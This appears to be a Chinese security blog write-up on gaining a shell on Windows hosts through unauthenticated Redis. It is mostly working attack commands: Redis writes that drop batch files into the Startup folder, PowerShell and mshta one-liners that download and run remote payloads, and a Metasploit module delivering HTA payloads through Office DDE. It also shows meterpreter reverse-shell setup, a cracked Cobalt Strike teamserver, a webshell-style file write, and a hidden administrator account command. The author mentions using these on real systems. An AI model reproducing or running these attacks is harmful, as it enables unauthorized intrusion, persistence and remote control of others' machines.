192.168.230.134:6379> config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/" OK 192.168.230.134:6379> config set dbfilename shell.bat OK 192.168.230.134:6379> set x "\r\n\r\npowershell -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.230.133/shell.ps1');xx.ps1\"\r\n\r\n" OK 192.168.230.134:6379> save OK
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##
class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Office Payload Delivery', 'Description' => %q{ This module generates an command to place within a word document, that when executed, will retrieve a HTA payload via HTTP from an web server. Currently have not figured out how to generate a doc. }, 'License' => MSF_LICENSE, 'Arch' => ARCH_X86, 'Platform' => 'win', 'Targets' => [ ['Automatic', {} ], ], 'DefaultTarget' => 0, )) end
def on_request_uri(cli, _request) print_status("Delivering payload") p = regenerate_payload(cli) data = Msf::Util::EXE.to_executable_fmt( framework, ARCH_X86, 'win', p.encoded, 'hta-psh', { :arch => ARCH_X86, :platform =>'win '} ) send_response(cli, data, 'Content-Type' => 'application/hta') end
def primer url = get_uri print_status("Place the following DDE in an MS document:") print_line("mshta.exe \"#{url}\"") end end
然后在msf里重新加载所有模块:reload_all 找到之后就可以使用了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
msf5 exploit(windows/msh_shell) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(windows/msh_shell) > set lhost 192.168.230.133 lhost => 192.168.230.133 msf5 exploit(windows/msh_shell) > set uripath shell uripath => shell msf5 exploit(windows/msh_shell) > exploit zlib(finalizer): the stream was freed prematurely. [*] Exploit running as background job 0. [*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.230.133:4444 [*] Using URL: http://0.0.0.0:8080/shell [*] Local IP: http://192.168.230.133:8080/shell [*] Server started. [*] Place the following DDE in an MS document: mshta.exe "http://192.168.230.133:8080/shell"
然后利用Redis写入bat文件到启动项
1 2 3 4 5 6 7 8 9
[root@localhost src]# ./redis-cli -h 192.168.230.134 192.168.230.134:6379> config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/" OK 192.168.230.134:6379> config set dbfilename shell.bat OK 192.168.230.134:6379> set x "\r\n\r\nmshta http://192.168.230.133:8080/shell\r\n\r\n" OK 192.168.230.134:6379> save OK
root@kali:/tools/cobaltctrike3.13-cracked# ./teamserver 192.168.230.133 233 [*] Generating X509 certificate and keystore (for SSL) [+] Team server is up on 50050 [*] SHA256 hash of SSL cert is: 56b1896ec2bc1dfaab7445e7b9e63f30ab640e5a6180c2ac41de3d936da6c13b
然后用客户端连接,用户名是msf,密码是233,端口具体看服务端返回的
创建一个listener,payload默认,端口自己设置
生成攻击脚本,注意端口别冲突
最后生成一串payload,用redis写一个bat脚本到启动项,然后等待目标重启即可
1 2 3 4 5 6 7 8 9
[root@localhost src]# ./redis-cli -h 192.168.230.134 192.168.230.134:6379> config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/" OK 192.168.230.134:6379> config set dbfilename shell.bat OK 192.168.230.134:6379> set x "\r\n\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.230.133:80/a'))\"\r\n\r\n" OK 192.168.230.134:6379> save OK
[root@localhost src]# ./redis-cli -h 192.168.230.134 192.168.230.134:6379> config set dir "C:/phpstudy/WWW" OK 192.168.230.134:6379> config set dbfilename phpinfo.php OK 192.168.230.134:6379> set x "\r\n\r\n<?php phpinfo();?>\r\n\r\n" OK 192.168.230.134:6379> save OK
0x05 一些思考
在真实环境中确实遇到了几个可以访问启动目录的系统,在测试的过程中,如果安装了安全软件也是可以拿到shell的。还有就是不知道如果开了3389端口的情况下,如果直接执行net user test$ xxxxxx /add & net localgroup administrators test$ /add这种命令会怎样?本地靶机测试是可以的。如果遇到server 2003的系统,可以用写MOF的方法拿shell。真实的业务环境还是很复杂,但是方法总比困难多。总结的不是很全面,有哪些老哥有好的思路欢迎一起交流。
评论